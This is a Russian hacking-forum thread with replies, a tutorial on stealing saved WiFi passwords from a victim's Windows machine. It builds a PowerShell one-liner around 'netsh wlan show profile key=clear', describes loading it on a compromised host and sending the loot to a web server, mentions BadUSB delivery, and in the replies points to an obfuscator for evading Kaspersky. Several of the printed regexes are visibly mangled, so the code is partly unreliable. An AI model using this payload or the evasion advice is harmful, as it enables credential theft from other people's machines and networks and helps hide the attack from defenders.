ANTICHAT

ANTICHAT (https://forum.antichat.io/index.php)
-   Этичный хакинг или пентестинг (https://forum.antichat.io/forumdisplay.php?f=209)
-   -   PowerShell для хакера (часть IX ) [Воруем сохраненные пароли от WiFi] (https://forum.antichat.io/showthread.php?t=560401)

<~DarkNode~> 05.09.2017 02:42

https://forum.antichat.xyz/attachmen...f8f32a0759.png

Доброго времени суток колеги. Прошу извинить меня за столь редкий онлайн
(Увы не всегда получается с вами тут посидеть ) ) Вот появилась минутка , решил потратить ее на написания очередной статьи на тему "PowerShell для хакера"

Сразу же хочу обратить внимание , что эта статья нацелена на машини семейства от Windows 7 c WiFi адептарами ( в большинстве случаев ноутбуки)

И так. Вот что мы освоим в этой статье:
  • Научимся смотретьинформацию о WiFi подключениях средствами командной строки Windows
  • Извлекать сохраненные пароли в командной строке Windows
  • Немного освоим регулярные выражения в PowerShell
  • С помощью регулярных выражений составим полезную нагрузка для дампа паролей от WiFi сетей жертвы
  • Закрепим подгрузку PowerShell через WEB
  • Закрепим отправку данных на веб-сервер методом Invoke-RestMethod.
И так друзья мои, зачем нам это все? Попытаюсь ответить:
  • Каждый сохранненный профиль от WiFi сети - это сегменты сети в которых бывает жертва и может оказаться ценным сегментом (пример - банковская WiFi сеть)
  • Пароль от домашнего WiFi может подойти к многим аккаунтам жертвы.
  • Готовых модулей в Metasploit и Emire для дампа WiFi я не встретил ( если я ошибся - прошу поправить меня и отписать в комментах)
  • Эта техника может быть использована для атак вида BadUSB ( спасибо за статьи @Dr.Lafa )
  • Ну и для общего развития
И так первое что мы освоим - это справку по команде netsh

https://forum.antichat.xyz/attachments/4783267/2.png

Конкретней нас интересует команда netsh wlan show profile
которая покажет нам список всех сохраненных WiFi

https://forum.antichat.xyz/attachments/4783267/1.png

Для того что бы извлечь пароль определенного профиля достаточно выполнить команду:
netsh wlan show profile key=clear
Очень важно передать параметр key=clear , иначе пароль не будет отображен в открытом виде.

https://forum.antichat.xyz/attachments/4783267/3.png

Ну вот с основными понятиями вроде как разобрались. Давайте перейдем к PowerShell. И так из этого всего вывода нам нужно отбросить ненужный текст и оставить только имя WiFi и Пароль от него.
Первым делом давайте выведем имена WiFi сетей c помощью оператора Select-String:
(netsh wlan show profiles) | Select-String "\.+)$"
Здесь мы в регулярном выражение фильтруем все строки где есть символ ":" и после которого следует больше одного (.+) символа и символ $ -- конец строки.

https://forum.antichat.xyz/attachments/4783267/4.png

Теперь давайте попытаемся вывести только SSID:
(netsh wlan show profiles) | Select-String "\.+)$" | %{$_.Matches.Groups[1].Value}
Скриплет %{$_.Matches.Groups[1].Value} -- берет из потокового вывода нужные нам совпадения и их значения. Но совпадения беруться из пробелами по-этому удаляем их функцией Trim()

https://forum.antichat.xyz/attachments/4783267/6.png

Для удобства все совпадения положим в переменную $name
(netsh wlan show profiles) | Select-String "\.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_}

https://forum.antichat.xyz/attachments/4783267/5.png

Теперь по этому же принципу нужно отобразить пароль от каждой SSID :

(netsh wlan show profiles) | Select-String "\.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}
Добавляется команда (netsh wlan show profile name="$name" key=clear) , которая в качестве имени SSID берет переменную $name :

Но опять же таки тут много лишнего текста:

https://forum.antichat.xyz/attachments/4783267/7.png

Так как у нас вывод на русском языке то ключевое слово , которое нам нужно для регулярного выражения будет : "Содержимое ключа" и наш следующий запрос будет иметь примерно такой вид:

(netsh wlan show profiles) | Select-String "\.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\.+)$"

https://forum.antichat.xyz/attachments/4783267/8.png

И конечная команда наша будет иметь примерно следующий вид:

(netsh wlan show profiles) | Select-String "\.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize

https://forum.antichat.xyz/attachments/4783267/9.png

Ну а далее все по накатанной схеме:
Размещаем к примеру:

https://forum.antichat.xyz/attachments/4783267/12.png

Подгружаем на скомпрометированной машине:

https://forum.antichat.xyz/attachments/4783267/10.png

И ловим пароли от WiFi:

https://forum.antichat.xyz/attachments/4783267/11.png


Всем спасибо за внимание)
Видео немножко поже сделаю.

jsat 05.09.2017 19:41

С нетерпением ждемс видео...

DSCH 05.09.2017 23:47

DarkNODE, сними видео как настоирть такой консольку + на кали как постовить арчи стайл. одельнго буду благадорень.

OBLIVIONNN 06.09.2017 10:06

А есть такой способ только для Android? Только без Android Terminala.

<~DarkNode~> 06.09.2017 11:39

На сколько помню то для просмотра сохраненных паролей на андроиде нужен Рут доступ.
[doublepost=1504683561,1504683107][/doublepost]Обзаведусь микрофоном где то через месяц, на настройку ушло пару часов, нужно будет писать видео с голосом.
Вообщем сделаю.

Air7771 06.09.2017 17:48

Цитата:


disconnekt сказал(а):

Статья отличная, только ключ показывается при условии, что пользователь локальный администратор. Или есть возможность посмотреть ключ из под обычного пользователя?


посмотреть ключ из под обычного пользователя? Пробовал не получилось...

<~DarkNode~> 07.09.2017 22:18

Цитата:


disconnekt сказал(а):

Статья отличная, только ключ показывается при условии, что пользователь локальный администратор. Или есть возможность посмотреть ключ из под обычного пользователя?


Цитата:


Air7771 сказал(а):

посмотреть ключ из под обычного пользователя? Пробовал не получилось...


https://forum.antichat.xyz/attachmen...b552522397.png

[doublepost=1504808328,1504804683][/doublepost]

Цитата:


Дедок сказал(а):

Надеюсь такая консолька не отправляет пакетики трафика туда кем именуется )? уж очень дизаин не юзерфрендли для параноика )


Это обычный легковесный тайловый оконный менеджер i3 и немного настроенный конфиг.

https://forum.antichat.xyz/attachmen...4f8cf28033.png

fysh 08.09.2017 00:39

Полезный цикл статей, для себя нашел много интересного...давай еще $i++

<~DarkNode~> 08.09.2017 11:25

Цитата:


Leon сказал(а):

Отличная статья, а антивири не ругаются?


Это не бинарный файл, это обычная команда для PowerShell. Не ругался и не должно в ближайшое время.

<~DarkNode~> 08.09.2017 13:12

Цитата:


Leon сказал(а):

N

Есть рабочий способ обхода Каспера в PowerShell-Empire?


Последний раз помогал в этом деле обфускатор.
https://codeby.net/threads/powershe...oleznoj-nagruzki-powershell-obfuscator.59453/


Время: 07:39